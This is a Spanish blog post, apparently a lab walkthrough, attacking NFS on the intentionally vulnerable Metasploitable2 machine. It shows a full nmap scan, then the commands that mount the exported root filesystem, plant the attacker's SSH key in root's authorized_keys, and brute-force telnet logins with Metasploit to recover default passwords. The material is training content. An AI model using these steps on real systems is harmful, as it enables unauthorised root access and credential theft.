En este post vamos a atacar los
servicios NFS (Network File System).
Este servicio permite compartir
ficheros, unidades cdrom/dvd, etc. remotamente, alojados en un
servidor, a disposición de cualquier cliente.
El puerto por defecto es el 2049 y su
sistema de transporte puede ser TCP o UDP.
Los RFC de este servicio son el 1094,
1813 y 3530 (versiones 2, 3 y 4 respectivamente).
Volvamos a poner el escaneo
Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-01 11:43 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating ARP Ping Scan at 11:43
Scanning 192.168.1.131 [1 port]
Completed ARP Ping Scan at 11:43, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:43
Completed Parallel DNS resolution of 1 host. at 11:43, 0.15s elapsed
Initiating SYN Stealth Scan at 11:43
Scanning 192.168.1.131 [1000 ports]
Discovered open port 21/tcp on 192.168.1.131
Discovered open port 139/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 5900/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
Discovered open port 445/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 25/tcp on 192.168.1.131
Discovered open port 23/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 3306/tcp on 192.168.1.131
Discovered open port 8009/tcp on 192.168.1.131
Discovered open port 2049/tcp on 192.168.1.131
Discovered open port 1524/tcp on 192.168.1.131
Discovered open port 512/tcp on 192.168.1.131
Discovered open port 6667/tcp on 192.168.1.131
Discovered open port 6000/tcp on 192.168.1.131
Discovered open port 513/tcp on 192.168.1.131
Discovered open port 8180/tcp on 192.168.1.131
Discovered open port 2121/tcp on 192.168.1.131
Discovered open port 514/tcp on 192.168.1.131
Discovered open port 5432/tcp on 192.168.1.131
Discovered open port 1099/tcp on 192.168.1.131
Completed SYN Stealth Scan at 11:43, 0.15s elapsed (1000 total ports)
Initiating Service scan at 11:43
Scanning 23 services on 192.168.1.131
Completed Service scan at 11:43, 11.31s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.131
NSE: Script scanning 192.168.1.131.
Initiating NSE at 11:43
Completed NSE at 11:44, 14.52s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Nmap scan report for 192.168.1.131
Host is up (0.00059s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2016-07-01T09:43:21+00:00; -35s from scanner time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 41183/tcp mountd
| 100005 1,2,3 49986/udp mountd
| 100021 1,3,4 41855/udp nlockmgr
| 100021 1,3,4 54128/tcp nlockmgr
| 100024 1 42483/tcp status
|_ 100024 1 49051/udp status
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 41183/tcp mountd
| 100005 1,2,3 49986/udp mountd
| 100021 1,3,4 41855/udp nlockmgr
| 100021 1,3,4 54128/tcp nlockmgr
| 100024 1 42483/tcp status
|_ 100024 1 49051/udp status
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 53
| Version: .0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
| Status: Autocommit
|_ Salt: 7HD[!-`|m0EJ$q2@-^sH
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 0:04:04
| source ident: nmap
| source host: 5AD5FCE2.78DED367.FFFA6D49.IP
|_ error: Closing Link: gjtkunzrr[192.168.1.134] (Quit: gjtkunzrr)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:67:3E:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.102 days (since Fri Feb 20 08:16:41 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2016-07-01T05:43:21-04:00
TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.1.131
NSE: Script Post-scanning.
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.64 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
Pongamos lo siguiente:
rpcinfo 192.168.1.131
rpcinfo -p 192.168.1.131
Veamos cuál es el directorio que está
compartido.
showmount -e 192.168.1.131
El directorio a compartir es el
directorio raíz.
Ahora, vamos a generar una nueva clave
ssh.
ssh-keygen
Vamos a crear un directorio temporal
mkdir /tmp/ROOT (para que no haya
problemas luego: ahora mismo estoy trabajando en el directorio /root)
Montamos el sistema de archivos.
mount -t nfs 192.168.1.131:/ /tmp/ROOT/
Por si no habéis caído, la barra
invertida que hay tras los dos puntos que siguen a la dirección IP,
es el directorio que nos están compartiendo.
Añadimos la clave que hemos creado al
archivo / remoto
cat /root/.ssh/id_rsa.pub >>
/tmp/ROOT/.ssh/authorized_keys
Y desmontamos
umount /tmp/ROOT
Hago un resumen de lo que hemos hecho:
Hemos creado un nuevo certificado ssh,
el cual lo hemos pasado al directorio raíz del servidor, el cual
está compartido. De esta manera, podremos abrir una sesión ssh
tranquilamente.
Si nos situamos en el directorio home,
podremos ver que existen 4 usuarios: ftp, msfadmin, service y user.
En nuestro equipo, crearemos un fichero users como sigue
ftp
msfadmin
service
user
Este será nuestro diccionario de
usuarios.
Y ahora, en metasploit, intentaremos
sacar las contraseñas por fuerza bruta
use
auxiliary/scanner/telnet/telnet_login
Y configuramos
Después de mucho tiempo, no saldrán
las contraseñas:
msfadmin – msfadmin
user – user
service-service
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.